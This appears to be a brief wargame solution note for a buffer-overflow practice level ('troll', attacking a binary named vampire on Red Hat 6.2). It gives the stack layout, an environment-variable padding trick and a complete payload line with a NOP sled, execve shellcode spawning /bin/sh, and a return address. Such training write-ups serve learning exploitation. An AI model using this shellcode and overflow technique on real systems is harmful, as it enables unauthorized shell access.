LOB Redhat 6.2 - troll

troll - check 0xbfff

Stack : buffer[40] + sfp[4] + ret[4] + Environment Variable

Dummy : export dummy=`python -c 'print "A"*80000'`

return address : 0xbffec3b9

Payload : ./vampire `python -c 'print "\x90"*21 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\xb9\xc3\xfe\xbf"'`

Using argv[1] address + Environment Variable Dummy